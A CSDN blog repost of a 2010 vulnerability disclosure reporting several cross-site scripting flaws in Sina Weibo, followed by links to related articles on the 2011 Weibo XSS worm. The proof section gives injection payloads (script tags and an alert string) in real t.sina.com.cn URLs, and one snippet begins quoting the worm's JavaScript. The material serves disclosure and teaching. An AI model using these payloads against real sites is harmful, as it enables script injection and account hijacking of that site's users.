新浪微博多处XSS漏洞

最新推荐文章于 2023-01-26 03:07:53 发布
最新推荐文章于 2023-01-26 03:07:53 发布
阅读量216 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124093666
版权

XSS漏洞 新浪微博 同城活动 安全修复 跨站脚本
关键词由CSDN通过智能技术生成

漏洞详情

披露状态:

2010-07-16: 细节已通知厂商并且等待厂商处理中
2010-08-18: 细节向公众公开

简要描述:

新浪微博多处粉严重的XSS,尽快修复吧

详细说明:

同城活动那里是有xss的,名称还是简介那里忘记了";alert(1);//你们再测下吧,今天不让发活动了- -次数限制太严格了……

漏洞证明:

http://t.sina.com.cn/pub/tags/%2522%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E
http://t.sina.com.cn/pub/news?filter[]=100&filter[]=99&filter[]=0&filter[]=5"><script>alert(1)</script><"&filter[]=4&&page=2

修复方案:

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
03-04
新浪微博攻击事件跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受...
WeiBo2:OC版本防新浪微博
06-20
总的来说,"WeiBo2: OC版本防新浪微博"项目展示了如何利用Objective-C来构建一个安全的微博客户端,其背后涉及了多个层面的安全策略和技术,包括身份验证、数据加密、网络通信安全、权限控制等多个方面。这些实践...
新浪微博ios客户端xss漏洞
葉落堂
02-20 642
漏洞作者: 路人甲 提交时间: 2011-12-24 公开时间: 2012-02-07 发布一段可以执行js代码的微博,在ios客户端上浏览  pestu: 利用方式:通过跨站偷偷打开一个网页,从referfe中获取gsid,而目标用户的uid可以很容易查到。要是新浪不使用短链,直接在微博上发一张图片就搞到gsid了。
两分钟窃取身边女神微博帐号?详解Android App AllowBackup配置带来的风险
键盘的起始页
05-27 1761
两分钟窃取身边女神微博帐号?详解Android App AllowBackup配置带来的风险 笔者在使用自己编写的Drozer模块对国内流行的安卓手机应用进行自动化扫描后发现有大量涉及用户财产和隐私的流行安卓应用存在Android AllowBackup漏洞,已测试成功受到漏洞影响的应用包括:新浪微博,百度云网盘,美团,大众点评,去哪儿等等。 [0x00] 漏洞案例 先来看一个情景案例,某IT男一直暗恋部门某女神,一天女神手机太卡了找IT男帮助清理手机空间,IT男高兴地答应女神两分钟搞定,屁颠屁颠的跑到自
新浪微博XSS漏洞攻击过程详解
weixin_34294649的博客
07-11 1405
今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博和私信,并自动关注一位名为hellosamy的用户。 事件的经过线索如下: 20:14,开始有大量带V...
XSS跨站脚本攻击实例讲解,新浪微博XSS漏洞过程分析
weixin_34186128的博客
07-11 563
2011年6月28日晚,新浪微博遭遇到XSS蠕虫攻击侵袭,在不到一个小时的时间,超过3万微博用户受到该XSS蠕虫的攻击。此事件给严重依赖社交网络的网友们敲响了警钟。在此之前,国内多家著名的SNS网站和大型博客网站都曾遭遇过类似的攻击事件,只不过没有形成如此大规模传播。虽然此次XSS蠕虫攻击事 件中,恶意黑客攻击者并没有在恶意脚本中植入挂马代码或其他窃取用户账号密码信息的脚本,但是这至少说明,病毒木...
基于ASP的新浪微博 v1.1.zip
最新发布
07-18
5. **安全性**:保护用户数据和系统安全,防止SQL注入、跨站脚本攻击(XSS)等常见Web漏洞。 6. **用户体验**:优化页面加载速度,提供响应式设计以适应不同设备,以及友好的用户界面设计。 7. **缓存管理**:通过...
2015软件开发校招笔试题(百度、阿里、网易、美团、新浪微博
12-16
这篇文档主要涵盖的是2015年各大知名互联网公司针对软件开发岗位的校园招聘笔试题目,包括了百度、阿里巴巴、网易、美团以及新浪微博这几家公司的面试题。这些笔试题是程序员在求职过程中可能会遇到的经典问题,反映...
xss攻击
2303_76249635的博客
01-26 275
对于xss攻击的简述 XSS是一种Cross-site scripting跨站脚本,它是一种经常在web应用中出现的漏洞,攻击者可以使用该漏洞注入任意恶意代码以实现对靶目标的攻击 xss又名css,其攻击方式大致可分为三种反射型xss,存储型xss,DOM型xss 其中反射型xss具有非持久性的特点另外两种攻击方式具有持久性攻击特点可长期存储在服务器数据库中 xss的危害 1.窃取用户信息 2.钓鱼攻击 3.拒绝服务攻击 4.劫持用户web行为进一步渗透内网 5.刷广告,刷流量,破坏服务器
新浪微博XSS攻击代码简要解析
首席技术执行官CTO(Chief Technology Officer)|技术总监--邓斌博客
11-14 2810
代码下载(来源鸽姆安全网) [javascript] view plaincopyprint?/**  *使用AJAX创建XMLHttpRequest对象,若不是IE浏览器,使用XMLHttpRequest创建XHR对象,  *否则使用ActiveXObject创建XHR对象。  */  function createXHR(){      return window.XMLHttpRequest
新浪微博XSS攻击
joy
03-26 716
新浪微博XSS攻击 http://coolshell.cn/articles/4914.html 阅读评论28,159 人阅读     今天晚上(2011年6月28日),新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说
新浪微博XSS攻击事件
TERRY的技术日志
06-29 3489
6月28日20时14分左右开始,新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博消息和私信,并自动关注一位名为hellosamy的用户。  事件的经过线索如下:20:14,开始有大量带
搜狐通行证某处反射xss
swordheart的博客
04-12 127
漏洞详情 披露状态: 2010-07-16: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 1970-01-21: 细节向普通白帽子公开 1970-01-31: 细节向实习白帽子公开 2010-08-18: 细节向公众公开 简要描述: 搜狐通行证某处反射xss 详细说明: 登录后状态下 http://passport.sohu.com/web/updateInfo.action?modifyT
新浪微博曾经受到过xss蠕虫攻击
gaisidewangzhan1的博客
05-15 1443
2)蠕虫新浪微博曾经受到过xss蠕虫攻击,代码如下[javascript] view plain copyfunction createXHR(){      return window.XMLHttpRequest?      new XMLHttpRequest():      new ActiveXObject("Microsoft.XMLHTTP");  }  function getap...
xss攻击之新浪微博xss蠕虫
zhangzhangdan的博客
07-21 2591
xss蠕虫:通过一个bug,感染其他结构都出现问题 我们根据一段xss攻击链接来看一下: 很显然,javascript代码被解析了,那它原型是什么呢,怎么看  通过这样我们可以看出,这段javascript代码是指向一个js文件,js文件中写的是一些文章标题链接,而这段链接也是携带这段javascript代码,这样当有人点击了这段链接,就又执行这个xss攻击操作了,这样一传十,十传百...
新浪短网址生成java_新浪短网址(T.cn)/腾讯短链接(Url.cn)在线生成以及API接口申请的教程...
weixin_39658726的博客
02-24 1182
你是否曾经需要共享一个链接,但是URL这么长,它看起来更像是一个乱码的鸡肋?没有必要担心,因为在线上有非常聪明的服务叫网址缩短器。这些服务将为您创建一个新的短链接,然后引导那些用户通过短连接访问您的很长的乱码的鸡肋URL。现在,你可以与任何你感兴趣的人分享这个链接,而不用担心干扰你的电子邮件、短信或微信朋友圈。这里我来一步一步的教大家如何讲自己的长链接转换成新浪短链接(T.cn)/腾讯短链接(Ur...
理解XSS漏洞:挖掘、防护与分类解析
"XSS漏洞挖掘与安全防护" XSS(Cross Site Scripting)漏洞网络安全领域的一个重要话题,尤其在Web应用中极为常见。这种漏洞允许攻击者在用户浏览网页时注入并执行恶意脚本,进而对用户的安全造成威胁。XSS攻击的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值